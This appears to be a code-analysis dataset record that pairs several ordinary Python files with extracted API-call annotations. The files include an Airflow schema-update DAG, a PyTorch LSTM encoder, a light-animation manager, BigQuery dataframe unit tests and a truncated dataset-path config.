[((151, 157), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (155, 157), False, 'from unittest.mock import Mock\n'), ((556, 592), 'marginTrading.github_api.buscar_avatar', 'github_api.buscar_avatar', (['"""sambiase"""'], {}), "('sambiase')\n", (580, 592), False, 'from marginTrading import github_api\n'), ((672, 708), 'marginTrading.github_api.buscar_avatar', 'github_api.buscar_avatar', (['"""sambiase"""'], {}), "('sambiase')\n", (696, 708), False, 'from marginTrading import github_api\n')]
|
# General imports
import importlib as il
import os
import sys
# Partial imports
from airflow.operators.python import PythonOperator
from airflow.models import Variable
from airflow import DAG
from airflow.utils.db import create_session
from datetime import datetime, timedelta
from typing import List
# Import from cornflow environment
from cornflow_client import ApplicationCore
default_args = {
"owner": "baobab",
"depends_on_past": False,
"start_date": datetime(2020, 2, 1),
"email": [""],
"email_on_failure": False,
"email_on_retry": False,
"retries": -1,
"retry_delay": timedelta(minutes=1),
"schedule_interval": "@hourly",
"catchup": False,
}
schemas = ["instance", "solution", "config"]
def get_new_apps() -> List[ApplicationCore]:
# we need to run this to be sure to import modules
import_dags()
new_apps = ApplicationCore.__subclasses__()
return [app_class() for app_class in new_apps]
def import_dags():
sys.path.append(os.path.dirname(__file__))
_dir = os.path.dirname(__file__)
print("looking for apps in dir={}".format(_dir))
files = os.listdir(_dir)
print("Files are: {}".format(files))
# we go file by file and try to import it if matches the filters
for dag_module in files:
filename, ext = os.path.splitext(dag_module)
if ext not in [".py", ""]:
continue
if filename in ["activate_apps"]:
continue
try:
_import_file(filename)
except Exception as e:
continue
def _import_file(filename):
return il.import_module(filename)
def get_schemas_dag_file(_module):
contents = {k: getattr(_module, k) for k in schemas}
return contents
def get_all_schemas():
apps = get_new_apps()
if len(apps):
print("Found the following apps: {}".format([app.name for app in apps]))
else:
print("No apps were found to update")
schemas_new = {app.name: app.get_schemas() for app in apps}
print("Found the following new apps: {}".format([app.name for app in apps]))
return schemas_new
def update_schemas(**kwargs):
schemas = get_all_schemas()
# we update all schemas that we found:
for key, value in schemas.items():
Variable.set(key=key, value=value, serialize_json=True)
# now we clean the variables that do not exist anymore:
with create_session() as session:
current_vars = set(var.key for var in session.query(Variable))
apps_to_delete = current_vars - schemas.keys()
print("About to delete old apps: {}".format(apps_to_delete))
for _var in apps_to_delete:
Variable.delete(_var, session)
dag = DAG(
"update_all_schemas", default_args=default_args, catchup=False, tags=["internal"]
)
update_schema2 = PythonOperator(
task_id="update_all_schemas",
provide_context=True,
python_callable=update_schemas,
dag=dag,
)
if __name__ == "__main__":
update_schemas()
|
[
"airflow.utils.db.create_session",
"airflow.DAG",
"airflow.operators.python.PythonOperator",
"importlib.import_module",
"os.path.dirname",
"datetime.datetime",
"cornflow_client.ApplicationCore.__subclasses__",
"datetime.timedelta",
"os.path.splitext",
"airflow.models.Variable.delete",
"airflow.models.Variable.set",
"os.listdir"
] |
[((2702, 2793), 'airflow.DAG', 'DAG', (['"""update_all_schemas"""'], {'default_args': 'default_args', 'catchup': '(False)', 'tags': "['internal']"}), "('update_all_schemas', default_args=default_args, catchup=False, tags=[\n 'internal'])\n", (2705, 2793), False, 'from airflow import DAG\n'), ((2813, 2924), 'airflow.operators.python.PythonOperator', 'PythonOperator', ([], {'task_id': '"""update_all_schemas"""', 'provide_context': '(True)', 'python_callable': 'update_schemas', 'dag': 'dag'}), "(task_id='update_all_schemas', provide_context=True,\n python_callable=update_schemas, dag=dag)\n", (2827, 2924), False, 'from airflow.operators.python import PythonOperator\n'), ((472, 492), 'datetime.datetime', 'datetime', (['(2020)', '(2)', '(1)'], {}), '(2020, 2, 1)\n', (480, 492), False, 'from datetime import datetime, timedelta\n'), ((611, 631), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(1)'}), '(minutes=1)\n', (620, 631), False, 'from datetime import datetime, timedelta\n'), ((874, 906), 'cornflow_client.ApplicationCore.__subclasses__', 'ApplicationCore.__subclasses__', ([], {}), '()\n', (904, 906), False, 'from cornflow_client import ApplicationCore\n'), ((1037, 1062), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1052, 1062), False, 'import os\n'), ((1128, 1144), 'os.listdir', 'os.listdir', (['_dir'], {}), '(_dir)\n', (1138, 1144), False, 'import os\n'), ((1597, 1623), 'importlib.import_module', 'il.import_module', (['filename'], {}), '(filename)\n', (1613, 1623), True, 'import importlib as il\n'), ((999, 1024), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1014, 1024), False, 'import os\n'), ((1308, 1336), 'os.path.splitext', 'os.path.splitext', (['dag_module'], {}), '(dag_module)\n', (1324, 1336), False, 'import os\n'), ((2266, 2321), 'airflow.models.Variable.set', 'Variable.set', ([], {'key': 'key', 'value': 'value', 'serialize_json': '(True)'}), '(key=key, value=value, serialize_json=True)\n', (2278, 2321), False, 'from airflow.models import Variable\n'), ((2391, 2407), 'airflow.utils.db.create_session', 'create_session', ([], {}), '()\n', (2405, 2407), False, 'from airflow.utils.db import create_session\n'), ((2663, 2693), 'airflow.models.Variable.delete', 'Variable.delete', (['_var', 'session'], {}), '(_var, session)\n', (2678, 2693), False, 'from airflow.models import Variable\n')]
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from vae_train.vae_utils import *
class Encoder(nn.Module):
def __init__(self, embedding_size=128, n_highway_layers=0, encoder_hidden_size=128, n_class=None, encoder_layers=1, bidirectional=False):
super(Encoder, self).__init__()
self.n_class = n_class
self.encoder_hidden_size = encoder_hidden_size
self.encoder_layers = encoder_layers
self.bidirectional = 2 if bidirectional else 1
if n_class is None:
self.lstm = nn.LSTM(input_size=embedding_size, hidden_size=encoder_hidden_size,
num_layers=encoder_layers, batch_first=True, bidirectional=bidirectional)
else:
self.lstm = nn.LSTM(input_size=embedding_size + n_class, hidden_size=encoder_hidden_size,
num_layers=encoder_layers, batch_first=True, bidirectional=bidirectional)
def forward(self, x, y=None, sent_len=None):
batch_size = x.shape[0]
seq_len = x.shape[1]
if self.n_class is not None and y is not None:
y = torch.cat([y]*seq_len, 1).view(batch_size,
seq_len, self.n_class)
x = torch.cat([x, y], dim=2)
output, (h_n, c_n) = self.lstm(x)
hidden = output[torch.arange(output.shape[0]), sent_len]
return hidden
|
[
"torch.nn.LSTM",
"torch.cat",
"torch.arange"
] |
[((569, 714), 'torch.nn.LSTM', 'nn.LSTM', ([], {'input_size': 'embedding_size', 'hidden_size': 'encoder_hidden_size', 'num_layers': 'encoder_layers', 'batch_first': '(True)', 'bidirectional': 'bidirectional'}), '(input_size=embedding_size, hidden_size=encoder_hidden_size,\n num_layers=encoder_layers, batch_first=True, bidirectional=bidirectional)\n', (576, 714), True, 'import torch.nn as nn\n'), ((781, 941), 'torch.nn.LSTM', 'nn.LSTM', ([], {'input_size': '(embedding_size + n_class)', 'hidden_size': 'encoder_hidden_size', 'num_layers': 'encoder_layers', 'batch_first': '(True)', 'bidirectional': 'bidirectional'}), '(input_size=embedding_size + n_class, hidden_size=\n encoder_hidden_size, num_layers=encoder_layers, batch_first=True,\n bidirectional=bidirectional)\n', (788, 941), True, 'import torch.nn as nn\n'), ((1278, 1302), 'torch.cat', 'torch.cat', (['[x, y]'], {'dim': '(2)'}), '([x, y], dim=2)\n', (1287, 1302), False, 'import torch\n'), ((1370, 1399), 'torch.arange', 'torch.arange', (['output.shape[0]'], {}), '(output.shape[0])\n', (1382, 1399), False, 'import torch\n'), ((1149, 1176), 'torch.cat', 'torch.cat', (['([y] * seq_len)', '(1)'], {}), '([y] * seq_len, 1)\n', (1158, 1176), False, 'import torch\n')]
|
from photons_canvas.animations import register, AnimationRunner
from photons_canvas.animations.action import expand
from photons_app.errors import PhotonsAppError
from photons_app import helpers as hp
from delfick_project.option_merge import MergedOptions
from delfick_project.norms import sb
from textwrap import dedent
import logging
import asyncio
import io
log = logging.getLogger("interactor.commander.animations")
def errors(e):
if isinstance(e, KeyboardInterrupt):
return
if not isinstance(e, PhotonsAppError):
log.exception(e)
else:
log.error(e)
class Animation:
def __init__(self, final_future, identity, runner, pauser):
self.runner = runner
self.pauser = pauser
self.paused = False
self.identity = identity
self.final_future = final_future
@property
def info(self):
return self.runner.info
async def pause(self):
if not self.paused:
await self.pauser.acquire()
self.paused = True
async def resume(self):
self.paused = False
self.pauser.release()
async def stop(self):
self.final_future.cancel()
def start(self, tasks, *callbacks):
async def animation():
async with self.runner:
await self.runner.run()
self.task = tasks.add(animation())
for cb in callbacks:
self.task.add_done_callback(cb)
return self
class Animations:
available = register.available_animations()
def __init__(self, final_future, tasks, sender, animation_options):
self.tasks = tasks
self.sender = sender
self.final_future = final_future
self.animation_options = animation_options
self.animations = {}
def info(self, identity=None, expand=False, **extra):
if identity is not None:
if identity not in self.animations:
return
else:
return self.animations[identity].info
animations = {
identity: animation.info for identity, animation in sorted(self.animations.items())
}
if not expand:
animations = sorted(animations)
return {
"animations": animations,
"paused": sorted(
[animation.identity for animation in self.animations.values() if animation.paused]
),
**extra,
}
async def start(
self,
identity,
reference,
*,
run_options=sb.NotSpecified,
animations=sb.NotSpecified,
):
pauser = asyncio.Semaphore()
final_future = hp.ChildOfFuture(
self.final_future, name=f"Animations::start({identity})[final_future]"
)
if run_options is sb.NotSpecified:
run_options = {}
if animations is not sb.NotSpecified:
run_options = MergedOptions.using(run_options, {"animations": animations}).as_dict()
runner = AnimationRunner(
self.sender,
reference,
run_options,
final_future=final_future,
error_catcher=errors,
animation_options=self.animation_options,
)
runner.run_options.pauser = pauser
def remove(res):
if identity in self.animations:
del self.animations[identity]
self.animations[identity] = Animation(final_future, identity, runner, pauser).start(
self.tasks, remove
)
return self.info(started=identity)
async def pause(self, *identities):
return await self.action("pause", "pausing", identities)
async def resume(self, *identities):
return await self.action("resume", "resuming", identities)
async def stop(self, *identities):
return await self.action("stop", "stopping", identities)
async def help(self, animation_name=None):
out = io.StringIO()
def p(s=""):
print(s, file=out)
animation_kls = None
if animation_name in register.animations:
animation_kls = register.animations[animation_name].Animation
if animation_kls is None:
p("Available animations include")
for animation in register.available_animations():
p(f"* {animation}")
p()
p("To see options for a particular animation, run this again")
p("but with the `animation_name` option set to the name of the animation.")
p()
else:
p()
p("-" * 80)
p(f"{animation_name} animation")
p("-" * 80)
p()
expand(dedent(animation_kls.__doc__ or "").strip(), output=out)
out.flush()
out.seek(0)
return out.read()
async def action(self, method, verb, identities):
if not identities:
identities = list(self.animations)
changed = []
async with hp.TaskHolder(self.final_future, name=f"Animations::action({method})[ts]") as ts:
for identity in identities:
if identity in self.animations:
changed.append(identity)
ts.add(getattr(self.animations[identity], method)())
return self.info(**{verb: changed})
|
[
"textwrap.dedent",
"io.StringIO",
"asyncio.Semaphore",
"photons_canvas.animations.AnimationRunner",
"photons_canvas.animations.register.available_animations",
"photons_app.helpers.TaskHolder",
"photons_app.helpers.ChildOfFuture",
"delfick_project.option_merge.MergedOptions.using",
"logging.getLogger"
] |
[((370, 422), 'logging.getLogger', 'logging.getLogger', (['"""interactor.commander.animations"""'], {}), "('interactor.commander.animations')\n", (387, 422), False, 'import logging\n'), ((1504, 1535), 'photons_canvas.animations.register.available_animations', 'register.available_animations', ([], {}), '()\n', (1533, 1535), False, 'from photons_canvas.animations import register, AnimationRunner\n'), ((2631, 2650), 'asyncio.Semaphore', 'asyncio.Semaphore', ([], {}), '()\n', (2648, 2650), False, 'import asyncio\n'), ((2674, 2767), 'photons_app.helpers.ChildOfFuture', 'hp.ChildOfFuture', (['self.final_future'], {'name': 'f"""Animations::start({identity})[final_future]"""'}), "(self.final_future, name=\n f'Animations::start({identity})[final_future]')\n", (2690, 2767), True, 'from photons_app import helpers as hp\n'), ((3020, 3173), 'photons_canvas.animations.AnimationRunner', 'AnimationRunner', (['self.sender', 'reference', 'run_options'], {'final_future': 'final_future', 'error_catcher': 'errors', 'animation_options': 'self.animation_options'}), '(self.sender, reference, run_options, final_future=\n final_future, error_catcher=errors, animation_options=self.\n animation_options)\n', (3035, 3173), False, 'from photons_canvas.animations import register, AnimationRunner\n'), ((3968, 3981), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (3979, 3981), False, 'import io\n'), ((4299, 4330), 'photons_canvas.animations.register.available_animations', 'register.available_animations', ([], {}), '()\n', (4328, 4330), False, 'from photons_canvas.animations import register, AnimationRunner\n'), ((5016, 5090), 'photons_app.helpers.TaskHolder', 'hp.TaskHolder', (['self.final_future'], {'name': 'f"""Animations::action({method})[ts]"""'}), "(self.final_future, name=f'Animations::action({method})[ts]')\n", (5029, 5090), True, 'from photons_app import helpers as hp\n'), ((2931, 2991), 'delfick_project.option_merge.MergedOptions.using', 'MergedOptions.using', (['run_options', "{'animations': animations}"], {}), "(run_options, {'animations': animations})\n", (2950, 2991), False, 'from delfick_project.option_merge import MergedOptions\n'), ((4722, 4757), 'textwrap.dedent', 'dedent', (["(animation_kls.__doc__ or '')"], {}), "(animation_kls.__doc__ or '')\n", (4728, 4757), False, 'from textwrap import dedent\n')]
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import decimal
from unittest import mock
import pyarrow
import pytest
from google.cloud import bigquery
pandas = pytest.importorskip("pandas")
TEST_PATH = "/v1/project/test-proj/dataset/test-dset/table/test-tbl/data"
@pytest.fixture
def class_under_test():
from google.cloud.bigquery.table import RowIterator
return RowIterator
def test_to_dataframe_nullable_scalars(monkeypatch, class_under_test):
# See tests/system/test_arrow.py for the actual types we get from the API.
arrow_schema = pyarrow.schema(
[
pyarrow.field("bignumeric_col", pyarrow.decimal256(76, scale=38)),
pyarrow.field("bool_col", pyarrow.bool_()),
pyarrow.field("bytes_col", pyarrow.binary()),
pyarrow.field("date_col", pyarrow.date32()),
pyarrow.field("datetime_col", pyarrow.timestamp("us", tz=None)),
pyarrow.field("float64_col", pyarrow.float64()),
pyarrow.field("int64_col", pyarrow.int64()),
pyarrow.field("numeric_col", pyarrow.decimal128(38, scale=9)),
pyarrow.field("string_col", pyarrow.string()),
pyarrow.field("time_col", pyarrow.time64("us")),
pyarrow.field(
"timestamp_col", pyarrow.timestamp("us", tz=datetime.timezone.utc)
),
]
)
arrow_table = pyarrow.Table.from_pydict(
{
"bignumeric_col": [decimal.Decimal("123.456789101112131415")],
"bool_col": [True],
"bytes_col": [b"Hello,\x00World!"],
"date_col": [datetime.date(2021, 8, 9)],
"datetime_col": [datetime.datetime(2021, 8, 9, 13, 30, 44, 123456)],
"float64_col": [1.25],
"int64_col": [-7],
"numeric_col": [decimal.Decimal("-123.456789")],
"string_col": ["abcdefg"],
"time_col": [datetime.time(14, 21, 17, 123456)],
"timestamp_col": [
datetime.datetime(
2021, 8, 9, 13, 30, 44, 123456, tzinfo=datetime.timezone.utc
)
],
},
schema=arrow_schema,
)
nullable_schema = [
bigquery.SchemaField("bignumeric_col", "BIGNUMERIC"),
bigquery.SchemaField("bool_col", "BOOLEAN"),
bigquery.SchemaField("bytes_col", "BYTES"),
bigquery.SchemaField("date_col", "DATE"),
bigquery.SchemaField("datetime_col", "DATETIME"),
bigquery.SchemaField("float64_col", "FLOAT"),
bigquery.SchemaField("int64_col", "INT64"),
bigquery.SchemaField("numeric_col", "NUMERIC"),
bigquery.SchemaField("string_col", "STRING"),
bigquery.SchemaField("time_col", "TIME"),
bigquery.SchemaField("timestamp_col", "TIMESTAMP"),
]
mock_client = mock.create_autospec(bigquery.Client)
mock_client.project = "test-proj"
mock_api_request = mock.Mock()
mock_to_arrow = mock.Mock()
mock_to_arrow.return_value = arrow_table
rows = class_under_test(mock_client, mock_api_request, TEST_PATH, nullable_schema)
monkeypatch.setattr(rows, "to_arrow", mock_to_arrow)
df = rows.to_dataframe()
# Check for expected dtypes.
# Keep these in sync with tests/system/test_pandas.py
assert df.dtypes["bignumeric_col"].name == "object"
assert df.dtypes["bool_col"].name == "boolean"
assert df.dtypes["bytes_col"].name == "object"
assert df.dtypes["date_col"].name == "dbdate"
assert df.dtypes["datetime_col"].name == "datetime64[ns]"
assert df.dtypes["float64_col"].name == "float64"
assert df.dtypes["int64_col"].name == "Int64"
assert df.dtypes["numeric_col"].name == "object"
assert df.dtypes["string_col"].name == "object"
assert df.dtypes["time_col"].name == "dbtime"
assert df.dtypes["timestamp_col"].name == "datetime64[ns, UTC]"
# Check for expected values.
assert df["bignumeric_col"][0] == decimal.Decimal("123.456789101112131415")
assert df["bool_col"][0] # True
assert df["bytes_col"][0] == b"Hello,\x00World!"
# object is used by default, but we can use "datetime64[ns]" automatically
# when data is within the supported range.
# https://github.com/googleapis/python-bigquery/issues/861
assert df["date_col"][0] == datetime.date(2021, 8, 9)
assert df["datetime_col"][0] == pandas.to_datetime("2021-08-09 13:30:44.123456")
assert df["float64_col"][0] == 1.25
assert df["int64_col"][0] == -7
assert df["numeric_col"][0] == decimal.Decimal("-123.456789")
assert df["string_col"][0] == "abcdefg"
# Pandas timedelta64 might be a better choice for pandas time columns. Then
# they can more easily be combined with date columns to form datetimes.
# https://github.com/googleapis/python-bigquery/issues/862
assert df["time_col"][0] == datetime.time(14, 21, 17, 123456)
assert df["timestamp_col"][0] == pandas.to_datetime("2021-08-09 13:30:44.123456Z")
def test_to_dataframe_nullable_scalars_with_custom_dtypes(
monkeypatch, class_under_test
):
"""Passing in explicit dtypes is merged with default behavior."""
arrow_schema = pyarrow.schema(
[
pyarrow.field("int64_col", pyarrow.int64()),
pyarrow.field("other_int_col", pyarrow.int64()),
]
)
arrow_table = pyarrow.Table.from_pydict(
{"int64_col": [1000], "other_int_col": [-7]},
schema=arrow_schema,
)
nullable_schema = [
bigquery.SchemaField("int64_col", "INT64"),
bigquery.SchemaField("other_int_col", "INT64"),
]
mock_client = mock.create_autospec(bigquery.Client)
mock_client.project = "test-proj"
mock_api_request = mock.Mock()
mock_to_arrow = mock.Mock()
mock_to_arrow.return_value = arrow_table
rows = class_under_test(mock_client, mock_api_request, TEST_PATH, nullable_schema)
monkeypatch.setattr(rows, "to_arrow", mock_to_arrow)
df = rows.to_dataframe(dtypes={"other_int_col": "int8"})
assert df.dtypes["int64_col"].name == "Int64"
assert df["int64_col"][0] == 1000
assert df.dtypes["other_int_col"].name == "int8"
assert df["other_int_col"][0] == -7
def test_to_dataframe_arrays(monkeypatch, class_under_test):
arrow_schema = pyarrow.schema(
[pyarrow.field("int64_repeated", pyarrow.list_(pyarrow.int64()))]
)
arrow_table = pyarrow.Table.from_pydict(
{"int64_repeated": [[-1, 0, 2]]},
schema=arrow_schema,
)
nullable_schema = [
bigquery.SchemaField("int64_repeated", "INT64", mode="REPEATED"),
]
mock_client = mock.create_autospec(bigquery.Client)
mock_client.project = "test-proj"
mock_api_request = mock.Mock()
mock_to_arrow = mock.Mock()
mock_to_arrow.return_value = arrow_table
rows = class_under_test(mock_client, mock_api_request, TEST_PATH, nullable_schema)
monkeypatch.setattr(rows, "to_arrow", mock_to_arrow)
df = rows.to_dataframe()
assert df.dtypes["int64_repeated"].name == "object"
assert tuple(df["int64_repeated"][0]) == (-1, 0, 2)
|
[
"unittest.mock.create_autospec",
"google.cloud.bigquery.SchemaField",
"pyarrow.decimal256",
"datetime.time",
"pyarrow.time64",
"pyarrow.binary",
"pyarrow.bool_",
"pyarrow.int64",
"datetime.date",
"datetime.datetime",
"pyarrow.timestamp",
"pyarrow.float64",
"pytest.importorskip",
"decimal.Decimal",
"pyarrow.Table.from_pydict",
"pyarrow.decimal128",
"unittest.mock.Mock",
"pyarrow.date32",
"pyarrow.string"
] |
[((707, 736), 'pytest.importorskip', 'pytest.importorskip', (['"""pandas"""'], {}), "('pandas')\n", (726, 736), False, 'import pytest\n'), ((3360, 3397), 'unittest.mock.create_autospec', 'mock.create_autospec', (['bigquery.Client'], {}), '(bigquery.Client)\n', (3380, 3397), False, 'from unittest import mock\n'), ((3459, 3470), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (3468, 3470), False, 'from unittest import mock\n'), ((3491, 3502), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (3500, 3502), False, 'from unittest import mock\n'), ((5873, 5969), 'pyarrow.Table.from_pydict', 'pyarrow.Table.from_pydict', (["{'int64_col': [1000], 'other_int_col': [-7]}"], {'schema': 'arrow_schema'}), "({'int64_col': [1000], 'other_int_col': [-7]},\n schema=arrow_schema)\n", (5898, 5969), False, 'import pyarrow\n'), ((6146, 6183), 'unittest.mock.create_autospec', 'mock.create_autospec', (['bigquery.Client'], {}), '(bigquery.Client)\n', (6166, 6183), False, 'from unittest import mock\n'), ((6245, 6256), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (6254, 6256), False, 'from unittest import mock\n'), ((6277, 6288), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (6286, 6288), False, 'from unittest import mock\n'), ((6918, 7003), 'pyarrow.Table.from_pydict', 'pyarrow.Table.from_pydict', (["{'int64_repeated': [[-1, 0, 2]]}"], {'schema': 'arrow_schema'}), "({'int64_repeated': [[-1, 0, 2]]}, schema=arrow_schema\n )\n", (6943, 7003), False, 'import pyarrow\n'), ((7145, 7182), 'unittest.mock.create_autospec', 'mock.create_autospec', (['bigquery.Client'], {}), '(bigquery.Client)\n', (7165, 7182), False, 'from unittest import mock\n'), ((7244, 7255), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (7253, 7255), False, 'from unittest import mock\n'), ((7276, 7287), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (7285, 7287), False, 'from unittest import mock\n'), ((2743, 2795), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""bignumeric_col"""', '"""BIGNUMERIC"""'], {}), "('bignumeric_col', 'BIGNUMERIC')\n", (2763, 2795), False, 'from google.cloud import bigquery\n'), ((2805, 2848), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""bool_col"""', '"""BOOLEAN"""'], {}), "('bool_col', 'BOOLEAN')\n", (2825, 2848), False, 'from google.cloud import bigquery\n'), ((2858, 2900), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""bytes_col"""', '"""BYTES"""'], {}), "('bytes_col', 'BYTES')\n", (2878, 2900), False, 'from google.cloud import bigquery\n'), ((2910, 2950), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""date_col"""', '"""DATE"""'], {}), "('date_col', 'DATE')\n", (2930, 2950), False, 'from google.cloud import bigquery\n'), ((2960, 3008), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""datetime_col"""', '"""DATETIME"""'], {}), "('datetime_col', 'DATETIME')\n", (2980, 3008), False, 'from google.cloud import bigquery\n'), ((3018, 3062), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""float64_col"""', '"""FLOAT"""'], {}), "('float64_col', 'FLOAT')\n", (3038, 3062), False, 'from google.cloud import bigquery\n'), ((3072, 3114), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""int64_col"""', '"""INT64"""'], {}), "('int64_col', 'INT64')\n", (3092, 3114), False, 'from google.cloud import bigquery\n'), ((3124, 3170), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""numeric_col"""', '"""NUMERIC"""'], {}), "('numeric_col', 'NUMERIC')\n", (3144, 3170), False, 'from google.cloud import bigquery\n'), ((3180, 3224), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""string_col"""', '"""STRING"""'], {}), "('string_col', 'STRING')\n", (3200, 3224), False, 'from google.cloud import bigquery\n'), ((3234, 3274), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""time_col"""', '"""TIME"""'], {}), "('time_col', 'TIME')\n", (3254, 3274), False, 'from google.cloud import bigquery\n'), ((3284, 3334), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""timestamp_col"""', '"""TIMESTAMP"""'], {}), "('timestamp_col', 'TIMESTAMP')\n", (3304, 3334), False, 'from google.cloud import bigquery\n'), ((4482, 4523), 'decimal.Decimal', 'decimal.Decimal', (['"""123.456789101112131415"""'], {}), "('123.456789101112131415')\n", (4497, 4523), False, 'import decimal\n'), ((4836, 4861), 'datetime.date', 'datetime.date', (['(2021)', '(8)', '(9)'], {}), '(2021, 8, 9)\n', (4849, 4861), False, 'import datetime\n'), ((5059, 5089), 'decimal.Decimal', 'decimal.Decimal', (['"""-123.456789"""'], {}), "('-123.456789')\n", (5074, 5089), False, 'import decimal\n'), ((5386, 5419), 'datetime.time', 'datetime.time', (['(14)', '(21)', '(17)', '(123456)'], {}), '(14, 21, 17, 123456)\n', (5399, 5419), False, 'import datetime\n'), ((6022, 6064), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""int64_col"""', '"""INT64"""'], {}), "('int64_col', 'INT64')\n", (6042, 6064), False, 'from google.cloud import bigquery\n'), ((6074, 6120), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""other_int_col"""', '"""INT64"""'], {}), "('other_int_col', 'INT64')\n", (6094, 6120), False, 'from google.cloud import bigquery\n'), ((7055, 7119), 'google.cloud.bigquery.SchemaField', 'bigquery.SchemaField', (['"""int64_repeated"""', '"""INT64"""'], {'mode': '"""REPEATED"""'}), "('int64_repeated', 'INT64', mode='REPEATED')\n", (7075, 7119), False, 'from google.cloud import bigquery\n'), ((1176, 1208), 'pyarrow.decimal256', 'pyarrow.decimal256', (['(76)'], {'scale': '(38)'}), '(76, scale=38)\n', (1194, 1208), False, 'import pyarrow\n'), ((1249, 1264), 'pyarrow.bool_', 'pyarrow.bool_', ([], {}), '()\n', (1262, 1264), False, 'import pyarrow\n'), ((1306, 1322), 'pyarrow.binary', 'pyarrow.binary', ([], {}), '()\n', (1320, 1322), False, 'import pyarrow\n'), ((1363, 1379), 'pyarrow.date32', 'pyarrow.date32', ([], {}), '()\n', (1377, 1379), False, 'import pyarrow\n'), ((1424, 1456), 'pyarrow.timestamp', 'pyarrow.timestamp', (['"""us"""'], {'tz': 'None'}), "('us', tz=None)\n", (1441, 1456), False, 'import pyarrow\n'), ((1500, 1517), 'pyarrow.float64', 'pyarrow.float64', ([], {}), '()\n', (1515, 1517), False, 'import pyarrow\n'), ((1559, 1574), 'pyarrow.int64', 'pyarrow.int64', ([], {}), '()\n', (1572, 1574), False, 'import pyarrow\n'), ((1618, 1649), 'pyarrow.decimal128', 'pyarrow.decimal128', (['(38)'], {'scale': '(9)'}), '(38, scale=9)\n', (1636, 1649), False, 'import pyarrow\n'), ((1692, 1708), 'pyarrow.string', 'pyarrow.string', ([], {}), '()\n', (1706, 1708), False, 'import pyarrow\n'), ((1749, 1769), 'pyarrow.time64', 'pyarrow.time64', (['"""us"""'], {}), "('us')\n", (1763, 1769), False, 'import pyarrow\n'), ((1832, 1881), 'pyarrow.timestamp', 'pyarrow.timestamp', (['"""us"""'], {'tz': 'datetime.timezone.utc'}), "('us', tz=datetime.timezone.utc)\n", (1849, 1881), False, 'import pyarrow\n'), ((1999, 2040), 'decimal.Decimal', 'decimal.Decimal', (['"""123.456789101112131415"""'], {}), "('123.456789101112131415')\n", (2014, 2040), False, 'import decimal\n'), ((2148, 2173), 'datetime.date', 'datetime.date', (['(2021)', '(8)', '(9)'], {}), '(2021, 8, 9)\n', (2161, 2173), False, 'import datetime\n'), ((2205, 2254), 'datetime.datetime', 'datetime.datetime', (['(2021)', '(8)', '(9)', '(13)', '(30)', '(44)', '(123456)'], {}), '(2021, 8, 9, 13, 30, 44, 123456)\n', (2222, 2254), False, 'import datetime\n'), ((2351, 2381), 'decimal.Decimal', 'decimal.Decimal', (['"""-123.456789"""'], {}), "('-123.456789')\n", (2366, 2381), False, 'import decimal\n'), ((2448, 2481), 'datetime.time', 'datetime.time', (['(14)', '(21)', '(17)', '(123456)'], {}), '(14, 21, 17, 123456)\n', (2461, 2481), False, 'import datetime\n'), ((2531, 2610), 'datetime.datetime', 'datetime.datetime', (['(2021)', '(8)', '(9)', '(13)', '(30)', '(44)', '(123456)'], {'tzinfo': 'datetime.timezone.utc'}), '(2021, 8, 9, 13, 30, 44, 123456, tzinfo=datetime.timezone.utc)\n', (2548, 2610), False, 'import datetime\n'), ((5760, 5775), 'pyarrow.int64', 'pyarrow.int64', ([], {}), '()\n', (5773, 5775), False, 'import pyarrow\n'), ((5821, 5836), 'pyarrow.int64', 'pyarrow.int64', ([], {}), '()\n', (5834, 5836), False, 'import pyarrow\n'), ((6875, 6890), 'pyarrow.int64', 'pyarrow.int64', ([], {}), '()\n', (6888, 6890), False, 'import pyarrow\n')]
|
import os
import inspect
from tqdm import tqdm
import numpy as np
import typing
import cv2
import torchvision
import torch
from PIL import Image
from torch.utils.data import Dataset, DataLoader
# root (correct even if called)
CRT_ABS_PATH = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
# keys of dataset
KEYS = ["MNIST", "EI339", "combined"]
# relative to root/
PATH_TO_DATASET = {"MNIST": "MNIST/",
"EI339": "EI339-CN dataset sjtu/",
"MNIST+EI339": "MNIST+EI339/", }
# relative to root/PATH_TO_DATASET
DATASET_MAPPING_FN = {"MNIST": None,
"combined": None,
"EI339": {"train": {"data": "mapping/train_data.npy",
"label": "mapping/train_label.npy"},
"test": {"data": "mapping/test_data.npy",
"label": "mapping/test_label.npy"}, }, }
# relative to root/PATH_TO_DATASET
DATASET_SPLITS = {"MNIST": {"raw": "raw/",
"train": "processed/training.pt",
"test": "processed/test.pt"},
